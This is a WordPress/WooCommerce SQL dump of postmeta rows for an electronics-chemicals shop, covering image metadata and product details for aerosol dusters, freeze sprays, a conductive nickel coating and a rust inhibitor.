INSERT INTO `wp_postmeta` VALUES (17315, 1716, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3636;s:4:"file";s:23:"2016/08/aero-duster.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"aero-duster-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"aero-duster-800x518.jpg";s:5:"width";i:800;s:6:"height";i:518;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"aero-duster-768x497.jpg";s:5:"width";i:768;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"aero-duster-1600x1036.jpg";s:5:"width";i:1600;s:6:"height";i:1036;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"aero-duster-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"aero-duster-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"aero-duster-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"aero-duster-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17316, 1717, '_wp_attached_file', '2016/08/aero-dusters.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17317, 1717, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:2325;s:4:"file";s:24:"2016/08/aero-dusters.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"aero-dusters-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"aero-dusters-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"aero-dusters-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"aero-dusters-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"aero-dusters-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"aero-dusters-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"aero-dusters-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"aero-dusters-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17318, 489, '_thumbnail_id', '1717'); 
INSERT INTO `wp_postmeta` VALUES (17319, 489, '1367_default_editor', '<strong>MS-222N</strong> (14 oz Aerosol)\r\n\r\n<strong>MS-222T</strong> (10 oz Aerosol)\r\n\r\n<strong>MS-222L</strong> (10 oz Aerosol) (Low Global Warming)'); 
INSERT INTO `wp_postmeta` VALUES (17320, 489, '716_default_editor', '<ul>\r\n 	<li>Semiconductor chips</li>\r\n 	<li>Specimens under electron microscopes</li>\r\n 	<li>Photographic negatives</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17321, 489, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17322, 1719, '_edit_lock', '1476730426:3'); 
INSERT INTO `wp_postmeta` VALUES (17323, 1719, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17324, 1720, '_wp_attached_file', '2016/09/quik-freeze.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17325, 1720, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:23:"2016/09/quik-freeze.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"quik-freeze-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"quik-freeze-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"quik-freeze-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"quik-freeze-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"quik-freeze-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"quik-freeze-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"quik-freeze-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"quik-freeze-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17326, 1719, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17327, 1719, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17328, 1719, '_thumbnail_id', '1720'); 
INSERT INTO `wp_postmeta` VALUES (17329, 1719, '312_default_editor', '<ul>\r\n 	<li>Nonconductive*</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n* Does not apply to MS-242N-AS\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Molecular Weight</td>\r\n<td style="text-align: center;" width="180">102.03</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">-26.5°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">96.5 psia @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.21 @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (17330, 1719, '1367_default_editor', '<p class="h10"><strong>MS-242N</strong> (1- Aerosol)</p>\r\n<p class="h10"><strong>MS-242L</strong> (10 oz. Aerosol) (Low Global Warming)</p>'); 
INSERT INTO `wp_postmeta` VALUES (17331, 1719, '716_default_editor', '<ul>\r\n 	<li>Heat-cold intermittent testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electro-mechanical systems.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17332, 1719, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17333, 1719, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17334, 1719, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17335, 1719, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17336, 1719, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17337, 1719, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17338, 1719, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17339, 1719, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17340, 1719, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17341, 1719, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17342, 1719, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17343, 1719, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17344, 1719, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17345, 1719, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17346, 1719, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17347, 1719, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17348, 1719, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17349, 1719, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17350, 1719, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17351, 1719, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17352, 1719, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17353, 1719, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17354, 1719, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17355, 1719, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17356, 1719, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17357, 1719, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17358, 1719, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17359, 1719, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17360, 1719, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17361, 1719, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17362, 1719, '_ywtm_content_tab_description', '<strong>MS-242L (Low Global Warming): </strong>\r\n<p class="h10">For hot intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small area to -54ºF(-47ºC) Compatible with most plastics, rubbers and metals. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>'); 
INSERT INTO `wp_postmeta` VALUES (17363, 1719, '_product_image_gallery', '1743'); 
INSERT INTO `wp_postmeta` VALUES (17364, 489, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17365, 489, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17366, 489, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (17367, 489, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17368, 489, '_ywtm_content_tab_description', 'Also available in a low global warming formulation. The MS-222L a high purity product with no traces of contaminates and oils, which is essential for critical applications. Removes microscopic dust. Recommended for electro-mechanical instruments, computer equipment, optics and other equipment. May be used with the MS-228 Cobra® Duster extension for use in hard to reach areas. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (17369, 1722, '_edit_lock', '1484326587:3'); 
INSERT INTO `wp_postmeta` VALUES (17370, 1722, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17371, 1723, '_wp_attached_file', '2016/09/rfi-nickel-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17372, 1723, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3872;s:6:"height";i:2592;s:4:"file";s:30:"2016/09/rfi-nickel-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"rfi-nickel-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"rfi-nickel-coating-800x536.jpg";s:5:"width";i:800;s:6:"height";i:536;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"rfi-nickel-coating-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"rfi-nickel-coating-1600x1071.jpg";s:5:"width";i:1600;s:6:"height";i:1071;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"rfi-nickel-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"rfi-nickel-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"rfi-nickel-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"rfi-nickel-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17373, 1722, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17374, 1722, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17375, 1722, '_thumbnail_id', '3450'); 
INSERT INTO `wp_postmeta` VALUES (17376, 1722, '312_default_editor', 'Surface Resistivity (ASTM D-257): 0.7 ohm/sq.\r\n\r\nAdhesion on polycarbonate (ASTM D-3359): 3\r\n\r\nStatic Decay (5000 volts to zero): Instantaneous\r\n\r\nAttenuation (IEEE 299-2006 modified using a Duel TEM Cell)\r\n\r\n1 mHz: 51.0 dB\r\n\r\n10 mHz: 58.8 dB\r\n\r\n100 mHz: 38.9 dB\r\n\r\n1000 mHz: 57.3 dB'); 
INSERT INTO `wp_postmeta` VALUES (17377, 1722, '1367_default_editor', '<span style="text-decoration: underline;"><strong>Aerosol:</strong></span> MS-485G (12-14oz cans)\r\n\r\n<span style="text-decoration: underline;"><strong>Bulk</strong></span>:MS-487G (quarts, gallons, 5 gallons)'); 
INSERT INTO `wp_postmeta` VALUES (17378, 1722, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17379, 1722, '719_default_editor', '<ul>\r\n 	<li>ASTM D-3359</li>\r\n 	<li>ASTM D-257</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17380, 1722, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17381, 1722, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17382, 1722, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17383, 1722, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17384, 1722, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17385, 1722, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17386, 1722, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17387, 1722, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17388, 1722, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17389, 1722, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17390, 1722, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17391, 1722, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17392, 1722, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17393, 1722, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17394, 1722, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17395, 1722, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17396, 1722, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17397, 1722, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17398, 1722, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17399, 1722, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17400, 1722, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17401, 1722, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17402, 1722, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17403, 1722, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17404, 1722, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (17405, 1722, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17406, 1722, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17407, 1722, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17408, 1722, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17409, 1722, '_ywtm_content_tab_description', 'An excellent way to limit EMI/RFI emissions is with a ShieldSys Conductive Coating. G0831B is a black coating, which may be applied in a 2 mil layer to absorb EMI/RFI over a broad frequency range. This coating can be used effectively with Acrylic, Polycarbonate, ABS, Polystyrene, PVC and other plastics.\r\n\r\nAgitate material before and during use to prevent settling of the active ingredients. Apply to a clean, dry surface in a well-ventilated area at temperatures between 70-85ºF.\r\n\r\nRFI Nickel Conductive Coating can be applied by dipping, brushing and/or spraying. For best results when spraying, maintain pressure between 20-30 psi; adjust nozzle for acceptable spray pattern. Several light coats (2-3) applied from a distance of 10-12 inches will provide a 1.5-2.0 mil coating. Allow each coating to dry for 30 minutes before applying another coat. Do not dilute or contaminate with water.'); 
INSERT INTO `wp_postmeta` VALUES (17410, 1722, '_product_image_gallery', '3448,3449'); 
INSERT INTO `wp_postmeta` VALUES (17411, 1724, '_edit_lock', '1474913157:2'); 
INSERT INTO `wp_postmeta` VALUES (17412, 1724, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17413, 1725, '_wp_attached_file', '2016/09/rust-inhibitor.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17414, 1725, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:26:"2016/09/rust-inhibitor.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"rust-inhibitor-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"rust-inhibitor-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"rust-inhibitor-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"rust-inhibitor-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"rust-inhibitor-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"rust-inhibitor-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"rust-inhibitor-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"rust-inhibitor-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17415, 1724, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17416, 1724, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17417, 1724, '_thumbnail_id', '1725'); 
INSERT INTO `wp_postmeta` VALUES (17418, 1724, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17419, 1724, '1367_default_editor', '<p class="h10"><strong>J0912A</strong>  (12 oz. Aerosol)</p>'); 
INSERT INTO `wp_postmeta` VALUES (17420, 1724, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17421, 1724, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17422, 1724, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17423, 1724, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17424, 1724, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17425, 1724, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17426, 1724, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17427, 1724, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17428, 1724, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17429, 1724, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17430, 1724, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17431, 1724, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17432, 1724, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17433, 1724, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17434, 1724, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17435, 1724, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17436, 1724, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17437, 1724, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17438, 1724, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17439, 1724, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17440, 1724, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17441, 1724, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17442, 1724, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17443, 1724, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17444, 1724, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17445, 1724, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17446, 1724, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17447, 1724, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17448, 1726, '_edit_lock', '1475171126:2'); 
INSERT INTO `wp_postmeta` VALUES (17449, 1726, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17451, 1726, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17452, 1726, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17453, 1726, '312_default_editor', '<ul>\r\n 	<li>Nonconductive*</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17454, 1726, '1367_default_editor', '<p class="h10"><strong>MS-242N-AS</strong> (14 oz Aerosol)</p>\r\n<p class="h10"><strong>MS-242L-AS</strong> (10oz Aerosol) (Low Global Warming)</p>'); 
INSERT INTO `wp_postmeta` VALUES (17455, 1726, '716_default_editor', '<ul>\r\n 	<li>Heat-cold intermittent testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electro-mechanical systems.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17456, 1726, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17457, 1726, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17458, 1726, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17459, 1726, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17460, 1726, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17461, 1726, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17462, 1726, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17463, 1726, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17464, 1726, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17465, 1726, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17466, 1726, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17467, 1726, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17468, 1726, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17469, 1726, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17470, 1726, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17471, 1726, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17472, 1726, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17473, 1726, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17474, 1726, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17475, 1726, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17476, 1726, '_manage_stock', 'no'); 
